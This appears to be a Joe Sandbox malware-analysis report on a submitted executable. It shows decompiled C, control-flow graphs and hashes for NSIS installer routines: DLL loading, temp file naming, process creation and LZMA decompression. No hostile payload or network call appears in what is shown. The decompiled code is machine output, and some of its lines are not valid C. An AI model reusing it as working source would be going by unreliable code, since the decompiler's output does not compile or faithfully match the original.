                                                  control_flow_graph 505 40601d-40603d GetSystemDirectoryA 506 406041-406043 505->506 507 40603f 505->507 508 406053-406055 506->508 509 406045-40604d 506->509 507->506 511 406056-406084 wsprintfA LoadLibraryA 508->511 509->508 510 40604f-406051 509->510 510->511
                                                  C-Code - Quality: 100%
                                                  			E0040601D(intOrPtr _a4) {
                                                  				char _v292;
                                                  				int _t10;
                                                  				struct HINSTANCE__* _t14;
                                                  				void* _t16;
                                                  				void* _t21;
                                                  
                                                  				_t10 = GetSystemDirectoryA( &_v292, 0x104);
                                                  				if(_t10 > 0x104) {
                                                  					_t10 = 0;
                                                  				}
                                                  				if(_t10 == 0 ||  *((char*)(_t21 + _t10 - 0x121)) == 0x5c) {
                                                  					_t16 = 1;
                                                  				} else {
                                                  					_t16 = 0;
                                                  				}
                                                  				_t5 = _t16 + 0x409010; // 0x5c
                                                  				wsprintfA(_t21 + _t10 - 0x120, "%s%s.dll", _t5, _a4);
                                                  				_t14 = LoadLibraryA( &_v292); // executed
                                                  				return _t14;
                                                  			}









                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.311843412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.311830550.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.311864314.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.311880086.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.311893353.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.311939843.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.311957547.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.311975233.000000000042D000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Lc8xQv8iZY.jbxd
                                                  Similarity
                                                  • API ID: DirectoryLibraryLoadSystemwsprintf
                                                  • String ID: %s%s.dll$\
                                                  • API String ID: 2200240437-500877883
                                                  • Opcode ID: ab578b0f6e67864073cc7e0faf31571440b610376f19e1ac75bbbc29e234aff8
                                                  • Instruction ID: 31df564d024cf24b7dbdd433d12669610400c14d1f093727c30223d65afe2acb
                                                  • Opcode Fuzzy Hash: ab578b0f6e67864073cc7e0faf31571440b610376f19e1ac75bbbc29e234aff8
                                                  • Instruction Fuzzy Hash: CBF02B309441095BDF14E764DC0DEFB375CEB08344F0445BBA54BE10D2FA78E8698B98
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 512 405a01-405a0b 513 405a0c-405a36 GetTickCount GetTempFileNameA 512->513 514 405a45-405a47 513->514 515 405a38-405a3a 513->515 517 405a3f-405a42 514->517 515->513 516 405a3c 515->516 516->517
                                                  C-Code - Quality: 100%
                                                  			E00405A01(char _a4, intOrPtr _a6, CHAR* _a8) {
                                                  				signed int _t11;
                                                  				int _t14;
                                                  				signed int _t16;
                                                  				void* _t19;
                                                  				CHAR* _t20;
                                                  
                                                  				_t20 = _a4;
                                                  				_t19 = 0x64;
                                                  				while(1) {
                                                  					_t19 = _t19 - 1;
                                                  					_a4 = 0x61736e;
                                                  					_t11 = GetTickCount();
                                                  					_t16 = 0x1a;
                                                  					_a6 = _a6 + _t11 % _t16;
                                                  					_t14 = GetTempFileNameA(_a8,  &_a4, 0, _t20); // executed
                                                  					if(_t14 != 0) {
                                                  						break;
                                                  					}
                                                  					if(_t19 != 0) {
                                                  						continue;
                                                  					}
                                                  					 *_t20 =  *_t20 & 0x00000000;
                                                  					return _t14;
                                                  				}
                                                  				return _t20;
                                                  			}









                                                  APIs
                                                  • GetTickCount.KERNEL32 ref: 00405A14
                                                  • GetTempFileNameA.KERNELBASE(?,0061736E,00000000,?), ref: 00405A2E
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.311843412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.311830550.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.311864314.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.311880086.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.311893353.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.311939843.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.311957547.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.311975233.000000000042D000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Lc8xQv8iZY.jbxd
                                                  Similarity
                                                  • API ID: CountFileNameTempTick
                                                  • String ID: "C:\Users\user\Desktop\Lc8xQv8iZY.exe"$C:\Users\user\AppData\Local\Temp\$nsa
                                                  • API String ID: 1716503409-2995086764
                                                  • Opcode ID: fc5e126f8815d4696b9f295c06fae67d9d4e63728d0dbdda5093f58b42bfadad
                                                  • Instruction ID: 5b0006bac455ae629d1f86c67115003f625ce1c04593d449782858effb37a924
                                                  • Opcode Fuzzy Hash: fc5e126f8815d4696b9f295c06fae67d9d4e63728d0dbdda5093f58b42bfadad
                                                  • Instruction Fuzzy Hash: 81F020327082087BEB104E49EC44B9B7FADDFC5720F10C12BFA049A1C0C2B0A9488BA9
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 601 4058cf-4058ea call 405cfb call 405882 606 4058f0-4058fd call 405f5d 601->606 607 4058ec-4058ee 601->607 611 405909-40590b 606->611 612 4058ff-405903 606->612 608 405942-405944 607->608 614 405921-40592a lstrlenA 611->614 612->607 613 405905-405907 612->613 613->607 613->611 615 40592c-405940 call 4057ee GetFileAttributesA 614->615 616 40590d-405914 call 405ff6 614->616 615->608 621 405916-405919 616->621 622 40591b-40591c call 405835 616->622 621->607 621->622 622->614
                                                  C-Code - Quality: 53%
                                                  			E004058CF(void* __eflags, intOrPtr _a4) {
                                                  				int _t11;
                                                  				signed char* _t12;
                                                  				long _t16;
                                                  				intOrPtr _t18;
                                                  				intOrPtr* _t21;
                                                  				void* _t22;
                                                  
                                                  				E00405CFB(0x421988, _a4);
                                                  				_t21 = E00405882(0x421988);
                                                  				if(_t21 != 0) {
                                                  					E00405F5D(_t21);
                                                  					if(( *0x423f98 & 0x00000080) == 0) {
                                                  						L5:
                                                  						_t22 = _t21 - 0x421988;
                                                  						while(1) {
                                                  							_t11 = lstrlenA(0x421988);
                                                  							_push(0x421988);
                                                  							if(_t11 <= _t22) {
                                                  								break;
                                                  							}
                                                  							_t12 = E00405FF6();
                                                  							if(_t12 == 0 || ( *_t12 & 0x00000010) != 0) {
                                                  								E00405835(0x421988);
                                                  								continue;
                                                  							} else {
                                                  								goto L1;
                                                  							}
                                                  						}
                                                  						E004057EE();
                                                  						_t16 = GetFileAttributesA(??); // executed
                                                  						return 0 | _t16 != 0xffffffff;
                                                  					}
                                                  					_t18 =  *_t21;
                                                  					if(_t18 == 0 || _t18 == 0x5c) {
                                                  						goto L1;
                                                  					} else {
                                                  						goto L5;
                                                  					}
                                                  				}
                                                  				L1:
                                                  				return 0;
                                                  			}










                                                  APIs
                                                    • Part of subcall function 00405CFB: lstrcpynA.KERNEL32(?,?,00000400,004032FF,00423780,NSIS Error), ref: 00405D08
                                                    • Part of subcall function 00405882: CharNextA.USER32(4V@,?,C:\,00000000,004058E6,C:\,C:\,?,?,7476F560,00405634,?,C:\Users\user\AppData\Local\Temp\,7476F560), ref: 00405890
                                                    • Part of subcall function 00405882: CharNextA.USER32(00000000), ref: 00405895
                                                    • Part of subcall function 00405882: CharNextA.USER32(00000000), ref: 004058A4
                                                  • lstrlenA.KERNEL32(C:\,00000000,C:\,C:\,?,?,7476F560,00405634,?,C:\Users\user\AppData\Local\Temp\,7476F560), ref: 00405922
                                                  • GetFileAttributesA.KERNELBASE(C:\,C:\,C:\,C:\,C:\,C:\,00000000,C:\,C:\,?,?,7476F560,00405634,?,C:\Users\user\AppData\Local\Temp\,7476F560), ref: 00405932
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.311843412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.311830550.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.311864314.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.311880086.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.311893353.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.311939843.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.311957547.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.311975233.000000000042D000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Lc8xQv8iZY.jbxd
                                                  Similarity
                                                  • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                  • String ID: C:\
                                                  • API String ID: 3248276644-3404278061
                                                  • Opcode ID: e2955dcf029725b2ed1d5fce7c573bfe7ab26ede656e04fe1650c1d49aac5c3f
                                                  • Instruction ID: 03f6043ec37f77008ca106ed659fbfe74b4750b5f08ac9da600103de26cb934a
                                                  • Opcode Fuzzy Hash: e2955dcf029725b2ed1d5fce7c573bfe7ab26ede656e04fe1650c1d49aac5c3f
                                                  • Instruction Fuzzy Hash: 94F02822509E116AC222333A1C09A9F0A19CE86338714453BFC51B22D2DB3C8D53ED7E
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 624 40555b-405588 CreateProcessA 625 405596-405597 624->625 626 40558a-405593 CloseHandle 624->626 626->625
                                                  C-Code - Quality: 100%
                                                  			E0040555B(CHAR* _a4) {
                                                  				struct _PROCESS_INFORMATION _v20;
                                                  				int _t7;
                                                  
                                                  				0x422588->cb = 0x44;
                                                  				_t7 = CreateProcessA(0, _a4, 0, 0, 0, 0, 0, 0, 0x422588,  &_v20); // executed
                                                  				if(_t7 != 0) {
                                                  					CloseHandle(_v20.hThread);
                                                  					return _v20.hProcess;
                                                  				}
                                                  				return _t7;
                                                  			}






                                                  APIs
                                                  • CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00422588,Error launching installer), ref: 00405580
                                                  • CloseHandle.KERNEL32(?), ref: 0040558D
                                                  Strings
                                                  • Error launching installer, xrefs: 0040556E
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.311843412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.311830550.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.311864314.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.311880086.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.311893353.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.311939843.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.311957547.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.311975233.000000000042D000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Lc8xQv8iZY.jbxd
                                                  Similarity
                                                  • API ID: CloseCreateHandleProcess
                                                  • String ID: Error launching installer
                                                  • API String ID: 3712363035-66219284
                                                  • Opcode ID: 6ee0d5fb62aa5cd444cc046de2ae5613a3aa22ad20399a78c34ba76405e5be99
                                                  • Instruction ID: b38bf566800866b301abd826c958dc9a0f2413a88be004d39ffa53c3aefd5702
                                                  • Opcode Fuzzy Hash: 6ee0d5fb62aa5cd444cc046de2ae5613a3aa22ad20399a78c34ba76405e5be99
                                                  • Instruction Fuzzy Hash: 29E0ECB4A0020ABBDB109F64ED09A6B7BBDFB14345F808921A914E2150E7B8D9549A69
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph (figure not reproduced; nodes are marked Executed or Not Executed)
                                                  C-Code - Quality: 99%
                                                  			E00406768() {
                                                  				signed int _t530;
                                                  				void _t537;
                                                  				signed int _t538;
                                                  				signed int _t539;
                                                  				unsigned short _t569;
                                                  				signed int _t579;
                                                  				signed int _t607;
                                                  				void* _t627;
                                                  				signed int _t628;
                                                  				signed int _t635;
                                                  				signed int* _t643;
                                                  				void* _t644;
                                                  
                                                  				L0:
                                                  				while(1) {
                                                  					L0:
                                                  					_t530 =  *(_t644 - 0x30);
                                                  					if(_t530 >= 4) {
                                                  					}
                                                  					 *(_t644 - 0x40) = 6;
                                                  					 *(_t644 - 0x7c) = 0x19;
                                                  					 *((intOrPtr*)(_t644 - 0x58)) = (_t530 << 7) +  *(_t644 - 4) + 0x360;
                                                  					while(1) {
                                                  						L145:
                                                  						 *(_t644 - 0x50) = 1;
                                                  						 *(_t644 - 0x48) =  *(_t644 - 0x40);
                                                  						while(1) {
                                                  							L149:
                                                  							if( *(_t644 - 0x48) <= 0) {
                                                  								goto L155;
                                                  							}
                                                  							L150:
                                                  							_t627 =  *(_t644 - 0x50) +  *(_t644 - 0x50);
                                                  							_t643 = _t627 +  *((intOrPtr*)(_t644 - 0x58));
                                                  							 *(_t644 - 0x54) = _t643;
                                                  							_t569 =  *_t643;
                                                  							_t635 = _t569 & 0x0000ffff;
                                                  							_t607 = ( *(_t644 - 0x10) >> 0xb) * _t635;
                                                  							if( *(_t644 - 0xc) >= _t607) {
                                                  								 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t607;
                                                  								 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t607;
                                                  								_t628 = _t627 + 1;
                                                  								 *_t643 = _t569 - (_t569 >> 5);
                                                  								 *(_t644 - 0x50) = _t628;
                                                  							} else {
                                                  								 *(_t644 - 0x10) = _t607;
                                                  								 *(_t644 - 0x50) =  *(_t644 - 0x50) << 1;
                                                  								 *_t643 = (0x800 - _t635 >> 5) + _t569;
                                                  							}
                                                  							if( *(_t644 - 0x10) >= 0x1000000) {
                                                  								L148:
                                                  								_t487 = _t644 - 0x48;
                                                  								 *_t487 =  *(_t644 - 0x48) - 1;
                                                  								L149:
                                                  								if( *(_t644 - 0x48) <= 0) {
                                                  									goto L155;
                                                  								}
                                                  								goto L150;
                                                  							} else {
                                                  								L154:
                                                  								L146:
                                                  								if( *(_t644 - 0x6c) == 0) {
                                                  									L169:
                                                  									 *(_t644 - 0x88) = 0x18;
                                                  									L170:
                                                  									_t579 = 0x22;
                                                  									memcpy( *(_t644 - 0x90), _t644 - 0x88, _t579 << 2);
                                                  									_t539 = 0;
                                                  									L172:
                                                  									return _t539;
                                                  								}
                                                  								L147:
                                                  								 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
                                                  								 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
                                                  								_t484 = _t644 - 0x70;
                                                  								 *_t484 =  &(( *(_t644 - 0x70))[1]);
                                                  								 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
                                                  								goto L148;
                                                  							}
                                                  							L155:
                                                  							_t537 =  *(_t644 - 0x7c);
                                                  							 *((intOrPtr*)(_t644 - 0x44)) =  *(_t644 - 0x50) - (1 <<  *(_t644 - 0x40));
                                                  							while(1) {
                                                  								L140:
                                                  								 *(_t644 - 0x88) = _t537;
                                                  								while(1) {
                                                  									L1:
                                                  									_t538 =  *(_t644 - 0x88);
                                                  									if(_t538 > 0x1c) {
                                                  										break;
                                                  									}
                                                  									L2:
                                                  									switch( *((intOrPtr*)(_t538 * 4 +  &M00406BD6))) {
                                                  										case 0:
                                                  											L3:
                                                  											if( *(_t644 - 0x6c) == 0) {
                                                  												goto L170;
                                                  											}
                                                  											L4:
                                                  											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
                                                  											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
                                                  											_t538 =  *( *(_t644 - 0x70));
                                                  											if(_t538 > 0xe1) {
                                                  												goto L171;
                                                  											}
                                                  											L5:
                                                  											_t542 = _t538 & 0x000000ff;
                                                  											_push(0x2d);
                                                  											asm("cdq");
                                                  											_pop(_t581);
                                                  											_push(9);
                                                  											_pop(_t582);
                                                  											_t638 = _t542 / _t581;
                                                  											_t544 = _t542 % _t581 & 0x000000ff;
                                                  											asm("cdq");
                                                  											_t633 = _t544 % _t582 & 0x000000ff;
                                                  											 *(_t644 - 0x3c) = _t633;
                                                  											 *(_t644 - 0x1c) = (1 << _t638) - 1;
                                                  											 *((intOrPtr*)(_t644 - 0x18)) = (1 << _t544 / _t582) - 1;
                                                  											_t641 = (0x300 << _t633 + _t638) + 0x736;
                                                  											if(0x600 ==  *((intOrPtr*)(_t644 - 0x78))) {
                                                  												L10:
                                                  												if(_t641 == 0) {
                                                  													L12:
                                                  													 *(_t644 - 0x48) =  *(_t644 - 0x48) & 0x00000000;
                                                  													 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
                                                  													goto L15;
                                                  												} else {
                                                  													goto L11;
                                                  												}
                                                  												do {
                                                  													L11:
                                                  													_t641 = _t641 - 1;
                                                  													 *((short*)( *(_t644 - 4) + _t641 * 2)) = 0x400;
                                                  												} while (_t641 != 0);
                                                  												goto L12;
                                                  											}
                                                  											L6:
                                                  											if( *(_t644 - 4) != 0) {
                                                  												GlobalFree( *(_t644 - 4));
                                                  											}
                                                  											_t538 = GlobalAlloc(0x40, 0x600); // executed
                                                  											 *(_t644 - 4) = _t538;
                                                  											if(_t538 == 0) {
                                                  												goto L171;
                                                  											} else {
                                                  												 *((intOrPtr*)(_t644 - 0x78)) = 0x600;
                                                  												goto L10;
                                                  											}
                                                  										case 1:
                                                  											L13:
                                                  											__eflags =  *(_t644 - 0x6c);
                                                  											if( *(_t644 - 0x6c) == 0) {
                                                  												L157:
                                                  												 *(_t644 - 0x88) = 1;
                                                  												goto L170;
                                                  											}
                                                  											L14:
                                                  											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
                                                  											 *(_t644 - 0x40) =  *(_t644 - 0x40) | ( *( *(_t644 - 0x70)) & 0x000000ff) <<  *(_t644 - 0x48) << 0x00000003;
                                                  											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
                                                  											_t45 = _t644 - 0x48;
                                                  											 *_t45 =  *(_t644 - 0x48) + 1;
                                                  											__eflags =  *_t45;
                                                  											L15:
                                                  											if( *(_t644 - 0x48) < 4) {
                                                  												goto L13;
                                                  											}
                                                  											L16:
                                                  											_t550 =  *(_t644 - 0x40);
                                                  											if(_t550 ==  *(_t644 - 0x74)) {
                                                  												L20:
                                                  												 *(_t644 - 0x48) = 5;
                                                  												 *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) =  *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) & 0x00000000;
                                                  												goto L23;
                                                  											}
                                                  											L17:
                                                  											 *(_t644 - 0x74) = _t550;
                                                  											if( *(_t644 - 8) != 0) {
                                                  												GlobalFree( *(_t644 - 8));
                                                  											}
                                                  											_t538 = GlobalAlloc(0x40,  *(_t644 - 0x40)); // executed
                                                  											 *(_t644 - 8) = _t538;
                                                  											if(_t538 == 0) {
                                                  												goto L171;
                                                  											} else {
                                                  												goto L20;
                                                  											}
                                                  										case 2:
                                                  											L24:
                                                  											_t557 =  *(_t644 - 0x60) &  *(_t644 - 0x1c);
                                                  											 *(_t644 - 0x84) = 6;
                                                  											 *(_t644 - 0x4c) = _t557;
                                                  											_t642 =  *(_t644 - 4) + (( *(_t644 - 0x38) << 4) + _t557) * 2;
                                                  											goto L132;
                                                  										case 3:
                                                  											L21:
                                                  											__eflags =  *(_t644 - 0x6c);
                                                  											if( *(_t644 - 0x6c) == 0) {
                                                  												L158:
                                                  												 *(_t644 - 0x88) = 3;
                                                  												goto L170;
                                                  											}
                                                  											L22:
                                                  											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
                                                  											_t67 = _t644 - 0x70;
                                                  											 *_t67 =  &(( *(_t644 - 0x70))[1]);
                                                  											__eflags =  *_t67;
                                                  											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
                                                  											L23:
                                                  											 *(_t644 - 0x48) =  *(_t644 - 0x48) - 1;
                                                  											if( *(_t644 - 0x48) != 0) {
                                                  												goto L21;
                                                  											}
                                                  											goto L24;
                                                  										case 4:
                                                  											L133:
                                                  											_t559 =  *_t642;
                                                  											_t626 = _t559 & 0x0000ffff;
                                                  											_t596 = ( *(_t644 - 0x10) >> 0xb) * _t626;
                                                  											if( *(_t644 - 0xc) >= _t596) {
                                                  												 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t596;
                                                  												 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t596;
                                                  												 *(_t644 - 0x40) = 1;
                                                  												_t560 = _t559 - (_t559 >> 5);
                                                  												__eflags = _t560;
                                                  												 *_t642 = _t560;
                                                  											} else {
                                                  												 *(_t644 - 0x10) = _t596;
                                                  												 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
                                                  												 *_t642 = (0x800 - _t626 >> 5) + _t559;
                                                  											}
                                                  											if( *(_t644 - 0x10) >= 0x1000000) {
                                                  												goto L139;
                                                  											} else {
                                                  												goto L137;
                                                  											}
                                                  										case 5:
                                                  											L137:
                                                  											if( *(_t644 - 0x6c) == 0) {
                                                  												L168:
                                                  												 *(_t644 - 0x88) = 5;
                                                  												goto L170;
                                                  											}
                                                  											L138:
                                                  											 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
                                                  											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
                                                  											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
                                                  											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
                                                  											L139:
                                                  											_t537 =  *(_t644 - 0x84);
                                                  											L140:
                                                  											 *(_t644 - 0x88) = _t537;
                                                  											goto L1;
                                                  										case 6:
                                                  											L25:
                                                  											__edx = 0;
                                                  											__eflags =  *(__ebp - 0x40);
                                                  											if( *(__ebp - 0x40) != 0) {
                                                  												L36:
                                                  												__eax =  *(__ebp - 4);
                                                  												__ecx =  *(__ebp - 0x38);
                                                  												 *(__ebp - 0x34) = 1;
                                                  												 *(__ebp - 0x84) = 7;
                                                  												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                                                  												goto L132;
                                                  											}
                                                  											L26:
                                                  											__eax =  *(__ebp - 0x5c) & 0x000000ff;
                                                  											__esi =  *(__ebp - 0x60);
                                                  											__cl = 8;
                                                  											__cl = 8 -  *(__ebp - 0x3c);
                                                  											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                                                  											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                                                  											__ecx =  *(__ebp - 0x3c);
                                                  											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                                                  											__ecx =  *(__ebp - 4);
                                                  											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                                                  											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                                                  											__eflags =  *(__ebp - 0x38) - 4;
                                                  											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                  											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                  											if( *(__ebp - 0x38) >= 4) {
                                                  												__eflags =  *(__ebp - 0x38) - 0xa;
                                                  												if( *(__ebp - 0x38) >= 0xa) {
                                                  													_t98 = __ebp - 0x38;
                                                  													 *_t98 =  *(__ebp - 0x38) - 6;
                                                  													__eflags =  *_t98;
                                                  												} else {
                                                  													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                                                  												}
                                                  											} else {
                                                  												 *(__ebp - 0x38) = 0;
                                                  											}
                                                  											__eflags =  *(__ebp - 0x34) - __edx;
                                                  											if( *(__ebp - 0x34) == __edx) {
                                                  												L35:
                                                  												__ebx = 0;
                                                  												__ebx = 1;
                                                  												goto L61;
                                                  											} else {
                                                  												L32:
                                                  												__eax =  *(__ebp - 0x14);
                                                  												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                  												__eflags = __eax -  *(__ebp - 0x74);
                                                  												if(__eax >=  *(__ebp - 0x74)) {
                                                  													__eax = __eax +  *(__ebp - 0x74);
                                                  													__eflags = __eax;
                                                  												}
                                                  												__ecx =  *(__ebp - 8);
                                                  												__ebx = 0;
                                                  												__ebx = 1;
                                                  												__al =  *((intOrPtr*)(__eax + __ecx));
                                                  												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                                                  												goto L41;
                                                  											}
                                                  										case 7:
                                                  											L66:
                                                  											__eflags =  *(__ebp - 0x40) - 1;
                                                  											if( *(__ebp - 0x40) != 1) {
                                                  												L68:
                                                  												__eax =  *(__ebp - 0x24);
                                                  												 *(__ebp - 0x80) = 0x16;
                                                  												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                  												__eax =  *(__ebp - 0x28);
                                                  												 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                  												__eax =  *(__ebp - 0x2c);
                                                  												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                  												__eax = 0;
                                                  												__eflags =  *(__ebp - 0x38) - 7;
                                                  												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                  												__al = __al & 0x000000fd;
                                                  												__eax = (__eflags >= 0) - 1 + 0xa;
                                                  												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                                                  												__eax =  *(__ebp - 4);
                                                  												__eax =  *(__ebp - 4) + 0x664;
                                                  												__eflags = __eax;
                                                  												 *(__ebp - 0x58) = __eax;
                                                  												goto L69;
                                                  											}
                                                  											L67:
                                                  											__eax =  *(__ebp - 4);
                                                  											__ecx =  *(__ebp - 0x38);
                                                  											 *(__ebp - 0x84) = 8;
                                                  											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                                                  											goto L132;
                                                  										case 8:
                                                  											L70:
                                                  											__eflags =  *(__ebp - 0x40);
                                                  											if( *(__ebp - 0x40) != 0) {
                                                  												__eax =  *(__ebp - 4);
                                                  												__ecx =  *(__ebp - 0x38);
                                                  												 *(__ebp - 0x84) = 0xa;
                                                  												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                                                  											} else {
                                                  												__eax =  *(__ebp - 0x38);
                                                  												__ecx =  *(__ebp - 4);
                                                  												__eax =  *(__ebp - 0x38) + 0xf;
                                                  												 *(__ebp - 0x84) = 9;
                                                  												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                                                  												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                                                  											}
                                                  											goto L132;
                                                  										case 9:
                                                  											L73:
                                                  											__eflags =  *(__ebp - 0x40);
                                                  											if( *(__ebp - 0x40) != 0) {
                                                  												goto L90;
                                                  											}
                                                  											L74:
                                                  											__eflags =  *(__ebp - 0x60);
                                                  											if( *(__ebp - 0x60) == 0) {
                                                  												goto L171;
                                                  											}
                                                  											L75:
                                                  											__eax = 0;
                                                  											__eflags =  *(__ebp - 0x38) - 7;
                                                  											_t259 =  *(__ebp - 0x38) - 7 >= 0;
                                                  											__eflags = _t259;
                                                  											0 | _t259 = _t259 + _t259 + 9;
                                                  											 *(__ebp - 0x38) = _t259 + _t259 + 9;
                                                  											goto L76;
                                                  										case 0xa:
                                                  											L82:
                                                  											__eflags =  *(__ebp - 0x40);
